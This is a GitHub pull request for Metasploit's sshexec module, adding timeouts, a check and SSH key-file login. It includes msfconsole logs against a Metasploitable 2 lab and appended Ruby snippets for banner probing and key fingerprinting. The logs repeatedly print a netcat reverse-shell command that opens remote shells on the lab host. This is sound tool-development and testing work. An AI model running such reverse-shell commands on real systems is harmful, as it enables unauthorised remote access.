
sshexec: Timeout & KEY_FILE support#21508

Open
g0tmi1k wants to merge 9 commits into
rapid7:masterfrom
g0tmi1k:sshexec

Conversation

@g0tmi1k
Contributor

@g0tmi1k g0tmi1k commented May 26, 2026

This PR covers:

  • Use SSH mixin
  • Add check()
  • Add SSH_EXEC_TIMEOUT option & re-enable SSH_TIMEOUT support
  • Add KEY_FILE (and supports password protected)
  • Improve payload support
  • Update module metadata

Target is Metasploitable 2.

        current  name     hosts  services  vulns  creds  loots  notes
        -------  ----     -----  --------  -----  -----  -----  -----
Before: *        default  1      0         1      0      0      0
After : *        default  1      2         1      2      0      2

Setup

SSH keys have been pre-created & installed on the target ahead of time (came from doing another PR!)

Before

  • All testing was done using master branch
  • When targeting the wrong port, 21/TCP (aka FTP), the attack had to be killed manually (CTRL+C) - it wouldn't time out
  • Workspace would only get updated on a successful result
    • Service wasn't updated, nor were creds (even if successful)
  • Various "nags" with the payload choice
$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
setg PAYLOAD cmd/unix/reverse_netcat; set LHOST tap0;
use exploit/multi/ssh/sshexec;
set RHOSTS 10.0.0.10;
set target "Unix Cmd";
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
PAYLOAD => cmd/unix/reverse_netcat
LHOST => tap0
[*] Using configured payload cmd/unix/reverse_netcat
RHOSTS => 10.0.0.10
target => Unix Cmd

Module options (exploit/multi/ssh/sshexec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   yes       The password to authenticate with.
   RHOSTS    10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     22               yes       The target port (TCP)
   SRVHOST                    no        The local host to listen on and use for incoming connections
   SRVSSL    false            no        Negotiate SSL/TLS for local server connections
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME  root             yes       The user to authenticate as.


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVPORT  8080             yes       The local port to listen on


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tap0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   12  Unix Cmd



View the full module info with the info, or info -d command.

msf exploit(multi/ssh/sshexec) >
msf exploit(multi/ssh/sshexec) > run RPORT=9999
[+] mkfifo /tmp/hktww; nc 10.0.0.1 4444 0</tmp/hktww | /bin/sh >/tmp/hktww 2>&1; rm /tmp/hktww
[*] Started reverse TCP handler on 10.0.0.1:4444
[-] Exploit aborted due to failure: unreachable: Disconnected during negotiation
[*] Exploit completed, but no session was created.
msf exploit(multi/ssh/sshexec) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  0      0         0      0      0      0

msf exploit(multi/ssh/sshexec) >
msf exploit(multi/ssh/sshexec) > run RPORT=21
[+] mkfifo /tmp/cnzilef; nc 10.0.0.1 4444 0</tmp/cnzilef | /bin/sh >/tmp/cnzilef 2>&1; rm /tmp/cnzilef
[*] Started reverse TCP handler on 10.0.0.1:4444
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] run: Interrupted
msf exploit(multi/ssh/sshexec) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  0      0         0      0      0      0

msf exploit(multi/ssh/sshexec) >
msf exploit(multi/ssh/sshexec) > run
[+] mkfifo /tmp/njfopwh; nc 10.0.0.1 4444 0</tmp/njfopwh | /bin/sh >/tmp/njfopwh 2>&1; rm /tmp/njfopwh
[*] Started reverse TCP handler on 10.0.0.1:4444
[-] Exploit aborted due to failure: no-access: Failed authentication
[*] Exploit completed, but no session was created.
msf exploit(multi/ssh/sshexec) >
msf exploit(multi/ssh/sshexec) > run USERNAME=msfadmin PASSWORD=msfadmin
[+] mkfifo /tmp/cbeeb; nc 10.0.0.1 4444 0</tmp/cbeeb | /bin/sh >/tmp/cbeeb 2>&1; rm /tmp/cbeeb
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:22 - Sending stager...
[*] Executing mkfifo /tmp/iufubm; nc 10.0.0.1 4444 0</tmp/iufubm | /bin/sh >/tmp/iufubm 2>&1; rm /tmp/iufubm
[!] Timed out while waiting for command to return
[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.10:52384) at 2026-05-26 23:18:06 +0100

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
^Z
Background session 1? [y/N]  y
msf exploit(multi/ssh/sshexec) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      0         1      0      0      0

msf exploit(multi/ssh/sshexec) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10

msf exploit(multi/ssh/sshexec) > vulns

Vulnerabilities
===============

Timestamp                Host       Service  Resource  Name                     References
---------                ----       -------  --------  ----                     ----------
2026-05-26 22:18:05 UTC  10.0.0.10  None     {}        SSH User Code Execution  CVE-1999-0502,ATT&CK-T1021.004

msf exploit(multi/ssh/sshexec) >

After

$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
setg PAYLOAD cmd/unix/reverse_netcat; set LHOST tap0;
use exploit/multi/ssh/sshexec;
set RHOSTS 10.0.0.10;
set target "Unix Cmd";
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
PAYLOAD => cmd/unix/reverse_netcat
LHOST => tap0
[*] Using configured payload cmd/unix/reverse_netcat
RHOSTS => 10.0.0.10
target => Unix Cmd

Module options (exploit/multi/ssh/sshexec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   KEY_FILE                   no        Path to an SSH private key file
   KEY_PASS                   no        Passphrase for the SSH private key
   PASSWORD                   no        The password to authenticate with
   RHOSTS    10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     22               yes       The target port (TCP)
   SRVHOST                    no        The local host to listen on and use for incoming connections
   SRVSSL    false            no        Negotiate SSL/TLS for local server connections
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME                   yes       The user to authenticate as


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVPORT  8080             yes       The local port to listen on


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tap0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   12  Unix Cmd



View the full module info with the info, or info -d command.

msf exploit(multi/ssh/sshexec) >
msf exploit(multi/ssh/sshexec) > run RPORT=9999 USERNAME=msfadmin
[+] mkfifo /tmp/xmidoo; nc 10.0.0.1 4444 0</tmp/xmidoo | /bin/sh >/tmp/xmidoo 2>&1; rm /tmp/xmidoo
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. Could not connect to SSH service "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf exploit(multi/ssh/sshexec) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      0         0      0      0      0

msf exploit(multi/ssh/sshexec) >
msf exploit(multi/ssh/sshexec) > workspace -D
[*] Deleted workspace: default
[*] Recreated the default workspace
msf exploit(multi/ssh/sshexec) > run RPORT=21 USERNAME=msfadmin
[+] mkfifo /tmp/nrmoxao; nc 10.0.0.1 4444 0</tmp/nrmoxao | /bin/sh >/tmp/nrmoxao 2>&1; rm /tmp/nrmoxao
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. Could not connect to SSH service "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf exploit(multi/ssh/sshexec) >
msf exploit(multi/ssh/sshexec) > workspace -D
[*] Deleted workspace: default
[*] Recreated the default workspace
msf exploit(multi/ssh/sshexec) > run USERNAME=msfadmin
[+] mkfifo /tmp/kdehpix; nc 10.0.0.1 4444 0</tmp/kdehpix | /bin/sh >/tmp/kdehpix 2>&1; rm /tmp/kdehpix
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Authentication failed - credentials may be incorrect "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf exploit(multi/ssh/sshexec) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      2         0      0      0      0

msf exploit(multi/ssh/sshexec) >
msf exploit(multi/ssh/sshexec) >
msf exploit(multi/ssh/sshexec) > run USERNAME=msfadmin PASSWORD=msfadmin
[+] mkfifo /tmp/zrfooqg; nc 10.0.0.1 4444 0</tmp/zrfooqg | /bin/sh >/tmp/zrfooqg 2>&1; rm /tmp/zrfooqg
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Credentials accepted
[*] 10.0.0.10:22 - Sending stager...
[*] Executing: mkfifo /tmp/lkeekn; nc 10.0.0.1 4444 0</tmp/lkeekn | /bin/sh >/tmp/lkeekn 2>&1; rm /tmp/lkeekn
[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.10:57105) at 2026-05-26 23:43:31 +0100

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
^Z
Background session 1? [y/N]  y
msf exploit(multi/ssh/sshexec) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      2         1      1      0      2

msf exploit(multi/ssh/sshexec) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10             Linux    Ubuntu     8.04   server

msf exploit(multi/ssh/sshexec) > services
Services
========

host       port  proto  name  state  info                                   resource  parents
----       ----  -----  ----  -----  ----                                   --------  -------
10.0.0.10  22    tcp    ssh   open   SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1  {}        tcp (22/tcp)
10.0.0.10  22    tcp    tcp   open                                          {}

msf exploit(multi/ssh/sshexec) > vulns

Vulnerabilities
===============

Timestamp                Host       Service       Resource  Name                       References
---------                ----       -------       --------  ----                       ----------
2026-05-26 22:43:24 UTC  10.0.0.10  ssh (22/tcp)  {}        exploit/multi/ssh/sshexec  CVE-1999-0502,ATT&CK-T1021.004

msf exploit(multi/ssh/sshexec) > creds
Credentials
===========

id   host       origin     service       public    private   realm  private_type  JtR Format  cracked_password
--   ----       ------     -------       ------    -------   -----  ------------  ----------  ----------------
585  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin  msfadmin         Password

msf exploit(multi/ssh/sshexec) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type         Data
 ----                     ----       -------  ----  --------  ----         ----
 2026-05-26 22:43:24 UTC  10.0.0.10  ssh      22    tcp       ssh.cpe      {:cpe=>"cpe:/o:canonical:ubuntu_linux:8.04"}
 2026-05-26 22:43:24 UTC  10.0.0.10  ssh      22    tcp       ssh.hostkey  {:type=>"ssh-rsa", :fingerprint=>"SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk"}

msf exploit(multi/ssh/sshexec) >
msf exploit(multi/ssh/sshexec) > run KEY_FILE=/tmp/testkeys/rsa_2048_legacy_2
[-] Msf::OptionValidateError One or more options failed to validate: USERNAME.
msf exploit(multi/ssh/sshexec) >
msf exploit(multi/ssh/sshexec) >
msf exploit(multi/ssh/sshexec) > run KEY_FILE=/tmp/testkeys/rsa_2048_legacy_2 USERNAME=msfadmin
[+] mkfifo /tmp/dnhjnaa; nc 10.0.0.1 4444 0</tmp/dnhjnaa | /bin/sh >/tmp/dnhjnaa 2>&1; rm /tmp/dnhjnaa
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Credentials accepted
[*] 10.0.0.10:22 - Sending stager...
[*] Executing: mkfifo /tmp/biktw; nc 10.0.0.1 4444 0</tmp/biktw | /bin/sh >/tmp/biktw 2>&1; rm /tmp/biktw
[*] Command shell session 2 opened (10.0.0.1:4444 -> 10.0.0.10:49998) at 2026-05-26 23:46:36 +0100

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
^Z
Background session 2? [y/N]  y
msf exploit(multi/ssh/sshexec) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      2         1      2      0      2

msf exploit(multi/ssh/sshexec) > c
[-] Unknown command: c. Did you mean cd? Run the help command for more details.
msf exploit(multi/ssh/sshexec) > creds
Credentials
===========

id   host       origin     service       public    private                                          realm  private_type  JtR Format  cracked_password
--   ----       ------     -------       ------    -------                                          -----  ------------  ----------  ----------------
585  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin  msfadmin                                                Password
586  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin  6d:5d:df:2c:e6:5e:dd:a6:db:0d:84:4d:7d:bc:4a:19         SSH key

msf exploit(multi/ssh/sshexec) >
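The "Before" list above notes that pointing the module at a non-SSH port hung until CTRL+C, while the "After" runs show the new check() reporting "Could not connect to SSH service" for port 9999 and port 21. As an added illustration of that behaviour (this is not code from the PR or from Metasploit), the Ruby below probes for the SSH identification line with both the connect and the banner read bounded by a timeout, and classifies the outcome the way a pre-exploit check would. It runs against constructed loopback listeners; the status names, the FTP-style banner, the timeouts and the helper names are my own.

```ruby
require 'socket'
require 'timeout'

# Outcome of a pre-exploit connectivity check. The non-success states mirror
# what the module output above reports: unreachable (connection refused),
# unknown (connected but nothing usable came back before the timeout) and
# not_ssh (a listener that speaks some other protocol, e.g. an FTP port).
ProbeResult = Struct.new(:status, :banner, :detail)

# Connect to host:port and wait at most read_timeout seconds for the SSH
# identification line ("SSH-protoversion-softwareversion", RFC 4253 s4.2).
# Both the connect and the banner read are bounded, so a silent listener
# yields :unknown instead of hanging until the operator hits CTRL+C.
def probe_ssh_banner(host, port, connect_timeout: 2, read_timeout: 2)
  sock = Socket.tcp(host, port, connect_timeout: connect_timeout)
  line = begin
    Timeout.timeout(read_timeout) { sock.gets("\n") }
  ensure
    sock.close
  end
  return ProbeResult.new(:unknown, nil, 'connection closed without a banner') if line.nil?

  banner = line.chomp
  if banner.start_with?('SSH-')
    ProbeResult.new(:ssh, banner, nil)
  else
    ProbeResult.new(:not_ssh, banner, 'listener did not send an SSH identification string')
  end
rescue Timeout::Error
  ProbeResult.new(:unknown, nil, "no banner within #{read_timeout}s")
rescue Errno::ECONNREFUSED, Errno::ETIMEDOUT, Errno::EHOSTUNREACH, SocketError => e
  ProbeResult.new(:unreachable, nil, e.class.name)
end

# Constructed loopback listener standing in for a target (not a host from the
# page). banner == nil makes it accept the connection and then stay silent.
def with_listener(banner)
  server = TCPServer.new('127.0.0.1', 0)
  port = server.addr[1]
  thread = Thread.new do
    client = server.accept
    if banner
      client.write(banner)
    else
      sleep 10 # stay silent well past the probe's read timeout
    end
    client.close
  end
  yield port
ensure
  thread&.kill
  server&.close
end

# Bind and immediately release a port so a connect to it is refused.
def unused_port
  s = TCPServer.new('127.0.0.1', 0)
  port = s.addr[1]
  s.close
  port
end

# Run the probe against the four cases: real SSH banner (the string recorded in
# the services table above), a constructed FTP-style banner, a silent listener
# and a closed port.
def run_probes
  results = {}
  with_listener("SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1\r\n") do |port|
    results[:ssh] = probe_ssh_banner('127.0.0.1', port, read_timeout: 1)
  end
  with_listener("220 ftp ready\r\n") do |port| # constructed non-SSH banner
    results[:ftp] = probe_ssh_banner('127.0.0.1', port, read_timeout: 1)
  end
  with_listener(nil) do |port|
    results[:silent] = probe_ssh_banner('127.0.0.1', port, read_timeout: 1)
  end
  results[:closed] = probe_ssh_banner('127.0.0.1', unused_port)
  results
end

if __FILE__ == $0
  run_probes.each { |name, r| puts "#{name}: #{r.status} #{r.banner.inspect} #{r.detail}" }
end
```

Only the :ssh outcome carries a banner worth storing as the service `info` field; the other three are the cases where a check should return an "unknown" or "unreachable" result and leave the workspace alone rather than recording a vuln, which is the difference visible between the two `workspace -v` tables after the port 9999 and port 21 runs.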

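The KEY_FILE run above shows USERNAME being validated before the key is used, and the creds and notes tables store key material as fingerprints: a colon-separated MD5 fingerprint for the user key and a `SHA256:` base64 fingerprint for the host key. The Ruby below is an added example (not the module's or Metasploit's code) of how a KEY_FILE/KEY_PASS pair can be validated without falling back to a TTY passphrase prompt, and how those two fingerprint formats are derived from the OpenSSH public-key blob. The generated key, the passphrase and the status names are constructed for the example, and that the module derives its displayed fingerprint exactly this way is an assumption.

```ruby
require 'openssl'
require 'digest'
require 'base64'

# SSH wire encodings (RFC 4251 s5): string = uint32 length + bytes;
# mpint = big-endian two's complement, with a leading 0x00 when the high bit is set.
def ssh_string(bytes)
  [bytes.bytesize].pack('N') + bytes
end

def ssh_mpint(bn)
  bytes = bn.to_s(2)
  bytes = "\x00".b + bytes if !bytes.empty? && bytes.getbyte(0) >= 0x80
  ssh_string(bytes)
end

# OpenSSH public-key blob for an RSA key: "ssh-rsa", e, n (RFC 4253 s6.6).
def rsa_public_blob(key)
  ssh_string('ssh-rsa'.b) + ssh_mpint(key.e) + ssh_mpint(key.n)
end

# The two fingerprint styles seen in the creds and notes tables above.
def md5_fingerprint(blob)
  Digest::MD5.hexdigest(blob).scan(/../).join(':')
end

def sha256_fingerprint(blob)
  'SHA256:' + Base64.strict_encode64(Digest::SHA256.digest(blob)).delete('=')
end

# Load a PEM private key the way a KEY_FILE / KEY_PASS pair would be used.
# Returns [status, key] where status is :ok, :needs_passphrase (encrypted key,
# none supplied), :bad_passphrase (encrypted key, wrong one) or :unparseable.
def load_private_key(pem, passphrase = nil)
  encrypted = pem.include?('ENCRYPTED')
  return [:needs_passphrase, nil] if encrypted && passphrase.nil?

  # Passing an explicit (possibly empty) passphrase stops OpenSSL from
  # prompting on the terminal, so a wrong or missing passphrase fails fast.
  [:ok, OpenSSL::PKey.read(pem, passphrase || '')]
rescue OpenSSL::PKey::PKeyError
  [encrypted ? :bad_passphrase : :unparseable, nil]
end

# Generate a constructed 2048-bit key, export it both plain and
# passphrase-protected, and exercise the loader and fingerprint helpers.
def demo(passphrase = 'correct-horse-battery')
  key = OpenSSL::PKey::RSA.generate(2048)
  plain_pem = key.to_pem
  enc_pem = key.export(OpenSSL::Cipher.new('aes-256-cbc'), passphrase)
  blob = rsa_public_blob(key)

  st_plain, k_plain = load_private_key(plain_pem)
  st_nopass, _ = load_private_key(enc_pem)
  st_wrong, _ = load_private_key(enc_pem, 'wrong')
  st_right, k_right = load_private_key(enc_pem, passphrase)

  {
    plain: st_plain,
    no_pass: st_nopass,
    wrong_pass: st_wrong,
    right_pass: st_right,
    md5: md5_fingerprint(blob),
    sha256: sha256_fingerprint(blob),
    # Both loaded keys must reproduce the original public blob.
    roundtrip: !k_plain.nil? && !k_right.nil? &&
               rsa_public_blob(k_plain) == blob && rsa_public_blob(k_right) == blob
  }
end

if __FILE__ == $0
  demo.each { |k, v| puts "#{k}: #{v}" }
end
```

Storing only the fingerprint in the credential store, as the creds table does, lets the key be matched against `authorized_keys` entries or host-key notes later without the private material itself being written into the database listing.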
@smcintyre-r7 smcintyre-r7 self-assigned this May 28, 2026
@smcintyre-r7 smcintyre-r7 moved this from Todo to In Progress in Metasploit Kanban May 28, 2026
@smcintyre-r7 smcintyre-r7 removed their assignment May 28, 2026
@smcintyre-r7 smcintyre-r7 moved this from In Progress to Todo in Metasploit Kanban May 28, 2026